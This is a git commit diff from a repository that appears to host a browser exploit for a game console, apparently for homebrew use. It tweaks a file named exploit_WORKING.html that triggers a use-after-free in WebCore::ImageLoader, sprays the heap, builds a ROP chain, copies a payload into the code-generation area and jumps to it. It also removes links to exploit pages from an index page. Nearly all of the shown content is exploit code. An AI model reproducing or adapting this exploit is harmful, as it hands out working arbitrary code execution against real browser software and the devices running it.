Browse Source

better rate

pull/2/head
Winbagility 3 years ago
parent
commit
4dafe1641a
2 changed files with 5 additions and 8 deletions
  1. +1
    -5
      index.html
  2. +4
    -3
      payload/exploit_WORKING.html

+ 1
- 5
index.html View File

@@ -5,11 +5,7 @@
<div class="align">
<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
<a href="payload/exploit_WORKING.html"><h1>Exploit WORKING</h1></a><br/>
<a href="payload/exploit.html"><h1>Exploit DEV</h1></a><br/>
<br/>
<br/>
<br/>
<br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
</div>

+ 4
- 3
payload/exploit_WORKING.html View File

@@ -17,6 +17,7 @@ function UaF(a)
var sprayCount = 0x1900;
var _4K = 0x1000;
var _16K = 0x4000;
var _32K = 0x8000;
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
a.type="radio";
@@ -196,7 +197,7 @@ function UaF(a)
ropgen_switchto_core1();
//copy to payload to codegen
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _32K)
//prepare payload argument
payload_srcaddr = payloadAdress;
@@ -208,7 +209,7 @@ function UaF(a)
//Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted.
ropchain_appendu32(0x0);
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _32K)
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
}
@@ -229,7 +230,7 @@ function UaF(a)
);
}
alert("search");
//alert("wait...");
//Use the new WebCore::ImageLoader & pivot !
return 0;


Loading…
Cancel
Save